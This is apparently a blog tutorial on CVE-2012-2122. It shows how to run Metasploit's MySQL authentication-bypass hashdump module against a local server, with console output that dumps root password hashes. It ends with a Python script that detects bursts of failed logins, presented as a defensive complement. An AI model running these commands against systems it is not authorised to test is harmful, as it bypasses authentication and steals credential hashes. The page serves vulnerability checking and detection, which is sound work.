Metasploit, CVE-2012-2122

In another post we discussed the security flaw CVE-2012-2122, which affects MySQL and makes it possible to retrieve the login credentials (the password hashes) without having valid access. The Metasploit folks did not take long to publish a small Ruby module that exploits this vulnerability.
Below we will see how to use it to check whether our own database engine is vulnerable or not. If it is, you know the drill: time to update!
shell> msfconsole
msf> search mysql

Matching Modules
================
Name                                               Description
----                                               ------------------------
auxiliary/admin/mysql/mysql_enum                   MySQL Enumeration Module
auxiliary/admin/mysql/mysql_sql                    MySQL SQL Generic Query
auxiliary/admin/tikiwiki/tikidblib                 TikiWiki information...
auxiliary/analyze/jtr_mysql_fast                   John the Ripper MySQL
auxiliary/scanner/mysql/mysql_authbypass_hashdump  MYSQL CVE-2012-2122...
auxiliary/scanner/mysql/mysql_hashdump             MYSQL Password Hashdump
auxiliary/scanner/mysql/mysql_login                MySQL Login Utility
auxiliary/scanner/mysql/mysql_schemadump           MYSQL Schema Dump
auxiliary/scanner/mysql/mysql_version              MySQL Server Version...
exploit/linux/mysql/mysql_yassl_getname            MySQL yaSSL...
exploit/linux/mysql/mysql_yassl_hello              MySQL yaSSL...
exploit/windows/mysql/mysql_payload                Oracle MySQL...
exploit/windows/mysql/mysql_yassl_hello            MySQL yaSSL...
post/linux/gather/enum_configs                     Linux Gather...
post/linux/gather/enum_users_history               Linux Gather User...

msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump)> show options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

Name      Setting    Required  Description
----      -------    --------  -----------
RHOSTS               yes       The target address range or CIDR identifier
RPORT     3306       yes       The target port
THREADS   1          yes       The number of concurrent threads
USERNAME             no        The username to authenticate as

msf auxiliary(mysql_authbypass_hashdump)> set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump)> set USERNAME root
USERNAME => root
msf auxiliary(mysql_authbypass_hashdump)> show options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

Name      Setting    Required  Description
----      -------    --------  -----------
RHOSTS    127.0.0.1  yes       The target address range or CIDR identifier
RPORT     3306       yes       The target port
THREADS   1          yes       The number of concurrent threads
USERNAME  root       no        The username to authenticate as
The output for a vulnerable MySQL server will look similar to this:
msf auxiliary(mysql_authbypass_hashdump)> run
 
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
And the output for a server that is not vulnerable looks like this:
msf auxiliary(mysql_authbypass_hashdump)> run

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Authentication bypass is 30% complete
[*] 127.0.0.1:3306 Authentication bypass is 40% complete
[*] 127.0.0.1:3306 Authentication bypass is 50% complete
[*] 127.0.0.1:3306 Authentication bypass is 60% complete
[*] 127.0.0.1:3306 Authentication bypass is 70% complete
[*] 127.0.0.1:3306 Authentication bypass is 80% complete
[*] 127.0.0.1:3306 Authentication bypass is 90% complete
[*] 127.0.0.1:3306 Authentication bypass is 100% complete
[-] 127.0.0.1:3306 Unable to bypass authentication, this target may not be vulnerable
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
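A defender-side complement, added here and not part of the original post: whether or not the bypass succeeds, a run like the ones above leaves a burst of hundreds of failed logins for a single account from a single client in the MySQL error log within a few seconds. The script below flags such bursts; the log lines are constructed samples, and it assumes the server actually writes failed logins to its error log (on MySQL 5.x that needs log_warnings greater than 1).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of a MySQL 5.x error log (not taken from the page): a
# burst of failed 'root' logins from one client within one second, plus
# ordinary noise. Failed logins only reach the error log when log_warnings > 1.
SAMPLE_LOG = "\n".join(
    ["120611  1:35:37 [Warning] Access denied for user 'root'@'10.0.0.5' "
     "(using password: YES)"] * 300
    + ["120611  1:35:40 [Note] /usr/sbin/mysqld: ready for connections.",
       "120611  1:36:02 [Warning] Access denied for user 'app'@'10.0.0.9' "
       "(using password: YES)"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def parse_denials(text):
    """Yield (timestamp, user, host) for every failed-login warning."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(" ".join(m.group("ts").split()), "%y%m%d %H:%M:%S")
            yield ts, m.group("user"), m.group("host")

def find_bypass_bursts(text, window=timedelta(seconds=10), threshold=50):
    """Return {(user, host): peak_count} for every client that fails to log in
    to the same account at least `threshold` times inside any `window`.
    The CVE-2012-2122 bypass needs a few hundred attempts against one account
    (205 in the vulnerable run shown above), so that burst is what to alert on."""
    by_source = defaultdict(list)
    for ts, user, host in parse_denials(text):
        by_source[(user, host)].append(ts)
    alerts = {}
    for key, stamps in by_source.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):          # sliding window over time
            while ts - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[key] = max(alerts.get(key, 0), count)
    return alerts
```

Replace SAMPLE_LOG with the contents of the real error log to run it against a server; the 'app' entry shows that a single ordinary failure does not trigger an alert.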